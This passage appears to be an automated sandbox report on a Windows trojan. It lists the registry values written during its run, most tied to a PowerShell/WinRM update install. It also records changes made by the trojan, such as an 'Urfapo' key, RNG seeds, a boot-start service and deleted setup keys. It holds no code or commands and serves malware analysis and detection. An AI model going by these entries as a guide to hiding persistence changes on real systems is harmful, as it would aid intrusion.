[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\WINRM]
"CoInitializeSecurityParam" = "1"
[HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell]
"Path" = "%System%\WindowsPowerShell\v1.0\powershell.exe"
[HKCR\Microsoft.PowerShellConsole.1]
"FriendlyTypeName" = "Windows PowerShell Console File"
[HKCR\Microsoft.PowerShellModule.1\shell\Edit\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell_ise.exe %1"
[HKCR\WSMan.InternalAutomation]
"(Default)" = "WSMan InternalAutomation Class"
[HKCR\Microsoft.PowerShellData.1]
"FriendlyTypeName" = "Windows PowerShell Data File"
[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}\LocalServer32]
"(Default)" = "%System%\wsmprovhost.exe"
[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0]
"(Default)" = "Microsoft WSMAN Automation V1.0 Library"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\WINRM]
"AuthenticationCapabilities" = "12320"
[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}\TypeLib]
"Version" = "1.0"
[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational]
"Retention" = "0"
[HKLM\System\CurrentControlSet\Services\Eventlog\System\KB968930]
"EventMessageFile" = "%SystemRoot%\System32\spmsg.dll"
[HKCR\CLSID\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}]
"(Default)" = "PSFactoryBuffer"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"PublishingGroup" = "Management and Infrastructure Group"
[HKCR\Microsoft.PowerShellConsole.1\shell\open\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell.exe -p %1"
[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"Retention" = "0"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsPutSignature"
[HKLM\System\CurrentControlSet\Services\Eventlog\System\WinRM]
"ParameterMessageFile" = "%systemroot%\system32\kernel32.dll"
[HKCR\Interface\{17245DB2-74E5-45F6-8843-B7AEF309B6D6}\NumMethods]
"(Default)" = "6"
[HKLM\System\CurrentControlSet\Services\WinRM]
"DependOnService" = "RPCSS, HTTP, HTTPFilter"
[HKLM\System\CurrentControlSet\Services\Eventlog\System\WinRM]
"TypesSupported" = "7"
[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}]
"(Default)" = "IWSManEx"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"TSAware" = "1"
[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\AppID\{3e5ca495-8d6a-4d1f-ad99-177b426c8b8e}]
"(Default)" = "Microsoft Windows Remote Shell Host"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"UninstallCommand" = "%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.exe"
[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\InprocServer32]
"(Default)" = "%System%\WSMAUTO.DLL"
[HKCR\CLSID\{f4f7d085-cd01-43f9-899d-179c6df5ddad}\InprocServer32]
"ThreadingModel" = "Both"
[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"ConsoleHostModuleName" = "%System%\WindowsPowerShell\v1.0\Microsoft.PowerShell.ConsoleHost.dll"
[HKCR\WSMan.Automation\CLSID]
"(Default)" = "{BCED617B-EC03-420b-8508-977DC7A686BD}"
[HKCR\WSMan.Automation.1\CLSID]
"(Default)" = "{BCED617B-EC03-420b-8508-977DC7A686BD}"
[HKLM\System\CurrentControlSet\Services\WinRM]
"Type" = "32"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\fc8:109f88\iis]
"PathInetsrv" = "%System%\inetsrv"
"PathIISHelp" = "%WinDir%\Help\iishelp"
[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational\EventForwarder-Operational]
"EventMessageFile" = "%systemroot%\system32\wevtfwd.dll"
[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\VersionIndependentProgID]
"(Default)" = "WSMan.Automation"
[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKLM\System\CurrentControlSet\Services\WinRM]
"DisplayName" = "Windows Remote Management (WS-Management)"
[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}\TypeLib]
"Version" = "1.0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ\Regular]
"BitNames" = " rsError rsWarning rsTrace rsNone"
[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0\0\win32]
"(Default)" = "%System%\WsmAuto.dll"
[HKCR\Microsoft.PowerShellConsole.1]
"EditFlags" = "131072"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"InstalledDate" = "9/20/2015"
"ReleaseType" = "Software Update"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKCR\WSMan.InternalAutomation.1\CLSID]
"(Default)" = "{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}"
[HKCR\WSMan.Automation\CurVer]
"(Default)" = "WSMan.Automation.1"
[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\ProgID]
"(Default)" = "WSMan.InternalAutomation.1"
[HKCR\.ps1xml]
"(Default)" = "Microsoft.PowerShellXmlData.1"
[HKCR\Interface\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\NumMethods]
"(Default)" = "4"
[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"
[HKLM\System\CurrentControlSet\Services\WinRM]
"ImagePath" = "%WinDir%\System32\svchost.exe -k WinRM"
[HKLM\SYSTEM\LastKnownGoodRecovery\LastGood]
"INF/oem10.PNF" = "1"
[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"MaxSize" = "15728640"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B3 3B 67 3B 3C 5E 59 5A 15 F5 E8 BC 9F 0F 5C 2A"
[HKCR\CLSID\{F73C1438-71B4-4D91-AD13-1F889A03AC67}]
"(Default)" = "PSFactoryBuffer"
[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}]
"(Default)" = "PSFactoryBuffer"
[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"Sources" = "PowerShell"
[HKCR\AppID\{3feb2f63-0eec-4b96-84ab-da1307e0117c}]
"LaunchPermission" = "01 00 04 80 98 00 00 00 A4 00 00 00 00 00 00 00"
[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"
[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational]
"MaxSize" = "20971520"
[HKLM\System\CurrentControlSet\Services\WinRM\Parameters]
"ServiceDll" = "%SystemRoot%\system32\WsmSvc.dll"
[HKLM\SOFTWARE\Microsoft\PowerShell\1\1033]
"Install" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\fc8:109f88\iis]
"PathScripts" = "C:\Inetpub\iissamples\Scripts"
[HKCR\Microsoft.PowerShellScript.1\DefaultIcon]
"(Default)" = "%System%\WindowsPowerShell\V1.0\powershell_ise.exe,1"
[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\VersionIndependentProgID]
"(Default)" = "WSMan.InternalAutomation"
[HKCR\Microsoft.PowerShellData.1\shell\Edit\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell_ise.exe %1"
[HKLM\System\CurrentControlSet\Services\WinRM\Parameters]
"seRVicemAIN" = "ServiceMain"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\fc8:109f88\iis]
"PathFTPRoot" = "C:\Inetpub\ftproot"
[HKLM\System\CurrentControlSet\Services\Eventlog\System\EventForwarder]
"TypesSupported" = "7"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\fc8:109f88\iis]
"UpgradeType" = "0"
[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}\TypeLib]
"Version" = "1.0"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"InstalledBy" = "%CurrentUserName%"
[HKCR\Microsoft.PowerShellData.1\shell\Open\command]
"(Default)" = "%System%\notepad.exe %1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}\TypeLib]
"Version" = "1.0"
[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}]
"AppID" = "{3e5ca495-8d6a-4d1f-ad99-177b426c8b8e}"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"InstallerVersion" = "6.1.29.0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\fc8:109f88\iis]
"PathIISAdmin" = "%System%\inetsrv\iisadmin"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"DisplayIcon" = "%System%\WindowsPowerShell\v1.0\WTRInstaller.ico"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\.psc1]
"Content Type" = "application/PowerShell"
[HKCR\Microsoft.PowerShellXmlData.1]
"EditFlags" = "131072"
[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}]
"(Default)" = "WSMan InternalAutomation Class"
[HKCR\Microsoft.PowerShellData.1]
"EditFlags" = "131072"
[HKCR\Microsoft.PowerShellXmlData.1]
"FriendlyTypeName" = "Windows PowerShell XML Document"
[HKLM\System\CurrentControlSet\Services\WinRM]
"ErrorControl" = "1"
[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}\TypeLib]
"Version" = "1.0"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"ARPLink" = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930"
[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}]
"(Default)" = "IWSManResourceLocatorInternal"
[HKCR\Interface\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\ProxyStubClsid32]
"(Default)" = "{F73C1438-71B4-4D91-AD13-1F889A03AC67}"
[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"AutoBackupLogFiles" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\fc8:109f88\iis]
"IISProgramGroup" = "Microsoft Internet Information Services"
[HKCR\Interface\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\ProxyStubClsid32]
"(Default)" = "{F73C1438-71B4-4D91-AD13-1F889A03AC67}"
[HKCR\WSMan.InternalAutomation\CLSID]
"(Default)" = "{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"NoRepair" = "1"
[HKCR\CLSID\{f4f7d085-cd01-43f9-899d-179c6df5ddad}]
"(Default)" = "WinRM WMI Provider for User Profile"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"UninstallString" = "%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.exe"
[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\WSMan.Automation.1]
"(Default)" = "WSMan Automation Class"
[HKLM\SOFTWARE\Microsoft\PowerShell\1]
"Install" = "1"
[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"RuntimeVersion" = "v2.0.50727"
[HKCR\Interface\{17245DB2-74E5-45F6-8843-B7AEF309B6D6}]
"(Default)" = "IWSManProvHost"
[HKCR\Microsoft.PowerShellModule.1]
"FriendlyTypeName" = "Windows PowerShell Script Module"
[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\InprocServer32]
"(Default)" = "%System%\WSMAUTO.DLL"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"PackageVersion" = "1.0"
[HKCR\CLSID\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\InprocServer32]
"ThreadingModel" = "Both"
[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"
[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}\LocalServer32]
"ServerExecutable" = "%System%\winrshost.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"DisplayName" = "Windows Management Framework Core"
"InstallDate" = "20150920"
[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"Publisher" = "Microsoft Corporation"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"AllowProtectedRenames" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"ReleaseType" = "Software Update"
[HKCR\Interface\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\NumMethods]
"(Default)" = "4"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsDelSignature"
[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\InprocServer32]
"ThreadingModel" = "Both"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""
[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}]
"(Default)" = "IWSMan"
[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"PowerShellVersion" = "2.0"
[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\ProgID]
"(Default)" = "WSMan.Automation.1"
[HKCR\Microsoft.PowerShellScript.1\shell\Edit\command]
"(Default)" = "%System%\WindowsPowerShell\V1.0\powershell_ise.exe %1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Services\WinRM]
"DependOnGroup" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}]
"(Default)" = "WSMan Automation Class"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\fc8:109f88\iis]
"PathIISSamples" = "C:\Inetpub\iissamples"
[HKCR\Microsoft.PowerShellScript.1\shell\Open\command]
"(Default)" = "%System%\notepad.exe %1"
[HKCR\Interface\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}]
"(Default)" = "IHost"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"Publisher" = "Microsoft Corporation"
[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"
[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
[HKCR\Interface\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\ProxyStubClsid32]
"(Default)" = "{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}"
[HKCR\CLSID\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\InprocServer32]
"(Default)" = "%System%\wsmplpxy.dll"
[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"ApplicationBase" = "%System%\WindowsPowerShell\v1.0"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"InstallerName" = "Update.exe"
[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}]
"AppID" = "{3feb2f63-0eec-4b96-84ab-da1307e0117c}"
[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}]
"(Default)" = "Microsoft Windows Remote Shell Host"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"PackageName" = "Windows Management Framework Core"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""
[HKCR\Microsoft.PowerShellScript.1]
"FriendlyTypeName" = "Windows PowerShell Script"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ]
"LogSessionName" = "stdout"
[HKLM\System\CurrentControlSet\Services\WinRM]
"Description" = "Allows access to management information from local and remote machines."
[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}]
"(Default)" = "IWSManSession"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"HelpLink" = "http://go.microsoft.com/fwlink/?LinkID=163790"
[HKCR\WSMan.InternalAutomation.1]
"(Default)" = "WSMan Internal Class"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"Type" = "Update"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKCR\.psm1]
"(Default)" = "Microsoft.PowerShellModule.1"
[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0\HELPDIR]
"(Default)" = "%System%"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsVerifyHash"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Plugin\Microsoft.PowerShell]
"ConfigXML" = ""
[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell\PowerShell]
"CategoryMessageFile" = "%System%\WindowsPowerShell\v1.0\pwrshmsg.dll"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsCreateHash"
[HKLM\SYSTEM\LastKnownGoodRecovery\LastGood]
"INF/oem10.inf" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKCR\Interface\{17245DB2-74E5-45F6-8843-B7AEF309B6D6}\ProxyStubClsid32]
"(Default)" = "{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}"
[HKCR\WSMan.Automation]
"(Default)" = "WSMan Automation Class"
[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational]
"file" = "%systemroot%\system32\config\EventForwarding-Operational.Evt"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsIsMyFileType"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"URLInfoAbout" = "http://go.microsoft.com/fwlink/?LinkID=163792"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"RegistryLocation" = " HKLM,SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930"
[HKCR\Interface\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\NumMethods]
"(Default)" = "4"
[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational\EventForwarder-Operational]
"TypesSupported" = "7"
[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\InprocServer32]
"ThreadingModel" = "Both"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ\Regular]
"Guid" = "24b9a175-8716-40e0-9b2b-785de75b1e67"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN]
"SupportsCompatListeners" = "1"
[HKCR\Interface\{F73C1438-71B4-4D91-AD13-1F889A03AC67}]
"(Default)" = "IShell"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""
[HKCR\CLSID\{f4f7d085-cd01-43f9-899d-179c6df5ddad}\InprocServer32]
"(Default)" = "%System%\winrmprov.dll"
[HKCR\.ps1]
"(Default)" = "Microsoft.PowerShellScript.1"
[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}\TypeLib]
"Version" = "1.0"
[HKLM\System\CurrentControlSet\Services\WinRM]
"ObjectName" = "NT AUTHORITY\NetworkService"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\System\CurrentControlSet\Services\Eventlog\System\EventForwarder]
"EventMessageFile" = "%systemroot%\system32\wevtfwd.dll"
[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}\LocalServer32]
"(Default)" = "%System%\winrshost.exe"
[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ]
"Active" = "1"
[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}]
"(Default)" = "Microsoft Windows WSMan Provider Host"
[HKLM\SOFTWARE\Microsoft\PowerShell\1]
"PID" = "89383-100-0001260-04309"
[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"ConsoleHostAssemblyName" = "Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil"
[HKCR\.psd1]
"(Default)" = "Microsoft.PowerShellData.1"
[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}]
"(Default)" = "IWSManEnumerator"
[HKCR\CLSID\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\InprocServer32]
"(Default)" = "%System%\winrssrv.dll"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup]
"ServicePackCachePath" = "c:\windows\ServicePackFiles\ServicePackCache"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"
[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell\PowerShell]
"EventMessageFile" = "%System%\WindowsPowerShell\v1.0\pwrshmsg.dll"
[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}\TypeLib]
"Version" = "1.0"
The following service will be launched automatically at system boot up:
[HKLM\System\CurrentControlSet\Services\SENS]
"Start" = "2"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\fc8:109f88]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\fc8:109f88\iis]
The process net.exe:2156 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2E A5 0E 3D 34 D2 AA CA 2F CD E0 2C EF A3 9D 6D"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
The process net.exe:2224 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0C BC EA EA C3 14 51 D4 AC EB 1E 69 95 B3 CE D3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
The process net.exe:2416 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "31 5B 3B BE 03 57 23 FF 69 EB F3 BB EE 66 1F AD"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
The process hostname.exe:1384 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1A 52 A1 8D 57 C9 75 E6 5A AC D0 4F 66 72 46 D0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
The process PSCustomSetupUtil.exe:620 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "59 54 75 06 9D 4B F8 1F FE FB 0D 45 C8 74 36 7F"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
